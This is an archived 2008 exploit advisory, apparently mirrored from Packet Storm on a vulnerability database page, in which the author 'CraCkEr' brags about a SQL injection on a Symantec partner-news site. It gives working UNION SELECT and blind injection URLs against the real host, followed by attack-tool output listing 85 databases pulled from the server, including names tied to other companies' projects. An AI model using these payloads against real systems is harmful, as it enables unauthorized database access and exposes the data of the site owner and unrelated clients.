Lucene search

K

symantec-sql.txt

šŸ—“ļøĀ 09 Oct 2008Ā 00:00:00Reported byĀ CraCkErTypeĀ 
packetstorm
Ā packetstorm
šŸ”—Ā packetstormsecurity.comšŸ‘Ā 11Ā Views

High risk SQL injection vulnerability allows database access via GET method on Symantec site.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`ļ»æā”Œā”Œā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”  
││ C r a C k E r ā”Œā”˜  
ā”Œā”˜ T H E C R A C K O F E T E R N A L M I G H T ││  
ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ā”˜  
  
ā”Œā”€ā”€ā”€ā”€ From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
ā”Œā”Œā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”  
ā”Œā”˜ [ EZINE ] ā”Œā”˜  
ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ā”˜  
: Author : CraCkEr : : :  
│ Website : symantec.com │ │ Famous Sites Can Be │  
│ Vuln Type: Blind SQL Injection │ │ │  
│ Method : GET │ │ Olso Vulned │  
│ Critical : High [ā–‘ā–‘ā–’ā–’ā–“ā–“ā–ˆā–ˆ] │ │ │  
│ Impact : Database access │ │ │  
│ ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ └─────────────────────────────────── │  
│ DALnet #crackers ā”Œā”˜  
ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ā”˜  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
  
ā”Œā”Œā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”  
ā”Œā”˜ Exploit URL's ā”Œā”˜  
ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ā”˜  
  
[+] Remote SQL  
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=-1 union select 1,2,3--  
  
  
[+] Blind SQL  
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=1  
  
http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1 and 1=0  
  
  
[+] Text Change  
  
Bedriftsfordelene ved sosiale nettverk  
  
  
[+] Attack Results  
  
  
[+] URL:http://partnernews.symantec.com/2008/03/index.php?p=lp&l=1  
[+] Proxy Not Given  
[+] Gathering MySQL Server Configuration...  
[+] MySQL >= v5.0.0 found!  
[+] Showing all databases current user has access too!  
[+] 18:00:05  
[+] Number of Rows: 85  
[0]: hv_kompaktseminar_2008   
[1]: 3ds_statistics   
[2]: channelevent   
[3]: cpu_expertenforum_2008   
[4]: cpu_xmas_2007   
[5]: db_bt   
[6]: db_bt2008   
[7]: db_elearning   
[8]: db_elearning2   
[9]: db_farbreiz   
[10]: db_hpcd   
[11]: db_jsdesk   
[12]: db_pepper_oktoberfest2008   
[13]: db_ship   
[14]: db_shop   
[15]: db_shrek   
[16]: db_shrek_handover   
[17]: db_symantec   
[18]: db_wordstock   
[19]: demo_3ds_statistics   
[20]: demo_ajaxfb   
[21]: demo_bettgefluester   
[22]: demo_compel_bs   
[23]: demo_compel_tec   
[24]: demo_db_elearning   
[25]: demo_hp_smb_portal   
[26]: demo_hpsmartportal   
[27]: demo_hpsmartportal_at   
[28]: demo_hpsmartportal_at_ch   
[29]: demo_hpsmartportal_ch   
[30]: demo_hpsmartportal_de   
[31]: demo_hpsmartportal_nl   
[32]: demo_hpsmartportal_nl_int   
[33]: demo_iqpower   
[34]: demo_kanalm   
[35]: demo_panadress   
[36]: demo_panadress_old   
[37]: demo_pepper_joomla   
[38]: demo_pepper_website   
[39]: demo_pepperglobal   
[40]: demo_pepperglobal_new   
[41]: demo_phpproject   
[42]: demo_preferred   
[43]: demo_preferred_demo   
[44]: demo_symantec   
[45]: demo_test   
[46]: demo_zukunftspodium   
[47]: hp_elearning   
[48]: hp_elearning_2   
[49]: hp_mobiles-rechenzentrum   
[50]: hp_mobiles-rechenzentrum_handover   
[51]: hp_smb_portal   
[52]: hv_management_2007   
[53]: hv_management_2008   
[54]: linde_ltip_08   
[55]: linde_mtip_07   
[56]: linde_tilia_edm   
[57]: mysql   
[58]: oktoberfest2007   
[59]: oktoberfest_2008   
[60]: opengeodb   
[61]: partnernews_sep09   
[62]: pepperglobal   
[63]: pepperglobal_new   
[64]: pepperglobal_statistics   
[65]: phpmyadmin   
[66]: preferred   
[67]: preferred_handover   
[68]: remoteshell   
[69]: robertdill   
[70]: symantec_ddc_2   
[71]: symantec_partnernews   
[72]: symantec_partnernews_0108   
[73]: symantec_partnernews_0208   
[74]: symantec_partnernews_0308   
[75]: symantec_partnernews_0408   
[76]: symantec_partnernews_0508   
[77]: symantec_partnernews_0608   
[78]: symantec_partnernews_0708   
[79]: symantec_partnernews_0908   
[80]: symantec_partnernews_handover   
[81]: symantec_wordstock   
[82]: tenovis_wcp_3_0   
[83]: transcat_statistics   
[84]: webcast_portal_3_3   
[-] 00:58:04  
[-] Total URL Requests 10602  
[-] Done  
  
  
ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜  
  
Greets:  
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .  
  
ā”Œā”Œā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”  
ā”Œā”˜ Ā© CraCkEr 2008 ā”Œā”˜  
ā””ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”€ā”˜ā”˜  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactĀ us for a demo andĀ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
09 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
11
.json
Report